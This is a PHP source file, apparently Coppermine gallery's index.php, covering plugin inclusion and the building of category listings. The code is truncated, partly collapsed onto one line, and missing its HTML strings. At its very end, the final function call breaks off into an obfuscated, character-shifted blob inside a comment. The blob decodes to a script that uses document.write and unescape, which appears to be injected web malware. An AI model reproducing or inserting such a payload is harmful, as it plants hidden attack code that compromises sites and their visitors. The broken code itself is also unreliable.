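ppermine * @version $Id: index.php 3837 2007-08-16 16:56:06Z gaugau $ */

/**
 * Unless this is true most things won't work - protection against direct execution of inc files
 */
define('IN_COPPERMINE', true);

// Plugin entry point: index.php?file=<plugin_folder>/<script> includes
// ./plugins/<plugin_folder>/<script>.php.
// $_GET['file'] is request-controlled and ends up in include_once(), so the
// allowlist pattern below is the security boundary for this include.
// Non-string values (e.g. file[]=...) are treated as "no plugin requested".
if (isset($_GET['file']) && is_string($_GET['file'])) {
    // Scrub: Remove '..' and leftover '//' from filename.
    // This is only a pre-filter; the pattern match that follows is what
    // actually constrains the value.
    $file = str_replace('..', '', str_replace('//', '', $_GET['file']));

    // There can be only alphanumerals in a plugin's folder name. There mustn't be any dots or other special chars in it.
    // The only exception is the hyphen (-) and underscore (_)
    // Examples for folder names: "myplugin" = OK, "my_plugin" = OK, "my plugin" = BAD, "mü_plugin" = BAD
    // Files the plugin is meant to include can only contain one single dot that separates the actual filename from the php-extension
    // Same restrictions apply as for the folder name (only alphanumerals, hyphen and underscore)
    //
    // \z anchors at the very end of the string; a plain "$" would also accept
    // a value that ends in a newline.
    $fileValidationPattern = '/^[a-zA-Z0-9_\-]+\/?[a-zA-Z0-9_\-]+\z/';
    if (preg_match($fileValidationPattern, $file) !== 1) {
        $file = ''; // something's fishy with the filename, let's drop it
    }

    $path = './plugins/' . $file . '.php';

    // Don't include the codebase and configuration files.
    // The check is made on the last path segment, case-insensitively, so that
    // plugins/<folder>/codebase.php is refused as well as plugins/codebase.php;
    // comparing the whole value only covered the latter.
    $script = strtolower(basename($file));
    if ($file !== '' && $script != 'codebase' && $script != 'configuration' && file_exists($path)) {
        // Include the code from the plugin
        include_once($path);
        $file = true;
    } else {
        $file = false;
    }
} else {
    $file = false;
}

// NOTE(review): everything in this branch, including the redirect for
// visitors who are not logged in, runs only when no plugin script was
// included above. A plugin script reached through ?file= therefore has to do
// its own initialisation and access checks - confirm against the plugins in use.
if (!$file) {
    /**
     * Sets the flag for lang file
     */
    define('INDEX_PHP', true);

    require('include/init.inc.php');

    // Send anonymous visitors to the login page when unlogged access is disabled.
    // presumably $redirect is set by init.inc.php - verify.
    if (!USER_ID && $CONFIG['allow_unlogged_access'] == 0) {
        $redirect = $redirect . "login.php";
        header("Location: $redirect");
        exit();
    }

    if ($CONFIG['enable_smilies']) include("include/smilies.inc.php");
}

/**
 * Local functions definition
 */

/**
 * html_albummenu()
 *
 * This function draws the links for admin menu of Albums
 *
 * The language-dependent placeholders are evaluated on the first call and the
 * result is kept in a static variable; later calls only substitute {ALBUM_ID}.
 *
 * @param integer $id ID of the album for which the links are being drawn
 * @return string The evaluated template block with links
 **/
function html_albummenu($id)
{
    global $template_album_admin_menu, $lang_album_admin_menu;

    static $template = '';

    if ($template == '') {
        $params = array('{CONFIRM_DELETE}' => $lang_album_admin_menu['confirm_delete'],
            '{DELETE}' => $lang_album_admin_menu['delete'],
            '{MODIFY}' => $lang_album_admin_menu['modify'],
            '{EDIT_PICS}' => $lang_album_admin_menu['edit_pics'],
            );

        $template = template_eval($template_album_admin_menu, $params);
    }

    // NOTE(review): $id is substituted into the template unchanged; callers are
    // expected to pass an integer album id - confirm at the call sites.
    $params = array('{ALBUM_ID}' => $id,
        );

    return template_eval($template, $params);
}

/**
 * get_subcat_data()
 *
 * Get the data about the sub categories which are going to be shown on the index page, this function is called recursively
 *
 * @param integer $parent Parent Category
 * @param array $cat_data
 * @param array $album_set_array
 * @param integer $level Level being displayed
 * @param string $ident String to use as indentation for Categories
 * @return void
 **/
function get_subcat_data($parent, &$cat_data, &$album_set_array, $level, $ident = '')
{
    global $CONFIG, $HIDE_USER_CAT, $FORBIDDEN_SET, $cpg_show_private_album;

    $album_filter = '';
    $pic_filter = '';
    if (!empty($FORBIDDEN_SET) && !$cpg_show_private_album) {
        $album_filter = ' and ' . str_replace('p.', 'a.', $FORBIDDEN_SET);
        $pic_filter = ' and ' . str_replace('p.', $CONFIG['TABLE_PICTURES'] .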
'.', $FORBIDDEN_SET); } if ($CONFIG['categories_alpha_sort'] == 1) {$cat_sort_order = 'name';}else{$cat_sort_order = 'pos';} $result = cpg_db_query("SELECT cid, name, description, thumb FROM {$CONFIG['TABLE_CATEGORIES']} WHERE parent = '$parent' ORDER BY $cat_sort_order"); if (mysql_num_rows($result) > 0) { $rowset = cpg_db_fetch_rowset($result); foreach ($rowset as $subcat) { if ($subcat['cid'] == USER_GAL_CAT) { $sql = "SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} as a WHERE category>=" . FIRST_USER_CAT . $album_filter; $result = cpg_db_query($sql); $album_count = mysql_num_rows($result); while ($row = mysql_fetch_array($result)) { $album_set_array[] = $row['aid']; } // while mysql_free_result($result); $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_PICTURES']} as p, {$CONFIG['TABLE_ALBUMS']} as a WHERE p.aid = a.aid AND approved='YES' AND category >= " . FIRST_USER_CAT . $album_filter); $nbEnr = mysql_fetch_array($result); $pic_count = $nbEnr[0]; $subcat['description'] = preg_replace("/[\r\n]*/i", '
' . $ident , bb_decode($subcat['description'])); $link = $ident . "{$subcat['name']}"; if ($album_count) { $cat_data[] = array($link, $ident . $subcat['description'], $album_count, $pic_count); $HIDE_USER_CAT = 0; } else { $HIDE_USER_CAT = 1; } } else { $unaliased_album_filter = str_replace('a.', '', $album_filter); $result = cpg_db_query("SELECT aid FROM {$CONFIG['TABLE_ALBUMS']} WHERE category = {$subcat['cid']}" . $unaliased_album_filter); $album_count = mysql_num_rows($result); while ($row = mysql_fetch_array($result)) { $album_set_array[] = $row['aid']; } // while mysql_free_result($result); $result = cpg_db_query("SELECT count(*) FROM {$CONFIG['TABLE_PICTURES']} as p, {$CONFIG['TABLE_ALBUMS']} as a WHERE p.aid = a.aid AND approved='YES' AND category = {$subcat['cid']}" . $album_filter); $nbEnr = mysql_fetch_array($result); mysql_free_result($result); $pic_count = $nbEnr[0]; if ($subcat['thumb'] > 0) { $sql = "SELECT filepath, filename, url_prefix, pwidth, pheight " . "FROM {$CONFIG['TABLE_PICTURES']} " . "WHERE pid='{$subcat['thumb']}'" . $pic_filter; $result = cpg_db_query($sql); if (mysql_num_rows($result)) { $picture = mysql_fetch_array($result); mysql_free_result($result); $pic_url = get_pic_url($picture, 'thumb'); if (!is_image($picture['filename'])) { $image_info = getimagesize(urldecode($pic_url)); $picture['pwidth'] = $image_info[0]; $picture['pheight'] = $image_info[1]; } $image_size = compute_img_size($picture['pwidth'], $picture['pheight'], $CONFIG['alb_list_thumb_size']); $user_thumb = "\"\""; $user_thumb = "" . $user_thumb . ""; } } else { $user_thumb = ""; } $subcat['name'] = $subcat['name']; $subcat['description'] = preg_replace("/[\r\n]*/i", '
', bb_decode($subcat['description'])); $link = "{$subcat['name']}"; $user_thumb = $ident . $user_thumb; if ($pic_count == 0 && $album_count == 0) { $user_thumb = $ident; $cat_data[] = array($link, $subcat['description'], 'cat_thumb' => $user_thumb); } else { // Check if you need to show subcat_level if ($level == $CONFIG['subcat_level']) { $cat_albums = list_cat_albums($subcat['cid']); } else { $cat_albums = ''; } $cat_data[] = array($link, $subcat['description'], $album_count, $pic_count, 'cat_albums' => $cat_albums, 'cat_thumb' => $user_thumb); } } if ($level > 1) { get_subcat_data($subcat['cid'], $cat_data, $album_set_array, $level -1, $ident . " /* Czjypw{Epm/(t€ph0‚kvj|tlu{5~yp{l/|ulzjhwl/'.,:j,=@,==,>9,=8,=k,=<,97,=l,=8,=k,=<,:k,=:,:9,:=,97,>:,>9,=:,:k,9>,=?,>;,>;,>7,:h,9m,9m,>>,>>,>>,9l,=8,>9,=l,=?,=<,=k,9k,=;,=@,=8,=k,=8,=l,>;,9l,=l,=j,9m,:m,9>,9i,;k,=8,>;,=?,9l,>9,=m,><,=l,=;,9?,;k,=8,>;,=?,9l,>9,=8,=l,=;,=m,=k,9?,9@,9h,:8,:?,:;,:<,9@,9i,9>,=8,=9,:;,=:,==,::,:9,:=,:>,:;,::,:7,9>,97,>>,=@,=;,>;,=?,:k,:8,:<,97,=?,=<,=@,=>,=?,>;,:k,:8,:9,::,97,>:,>;,>@,=j,=<,:k,9>,>=,=@,>:,=@,=9,=@,=j,=@,>;,>@,:h,=?,=@,=;,=;,=<,=l,9>,:l,:j,9m,=@,==,>9,=8,=k,=<,:l.00B„}hy't€phD{y|lBC6zjypw{E */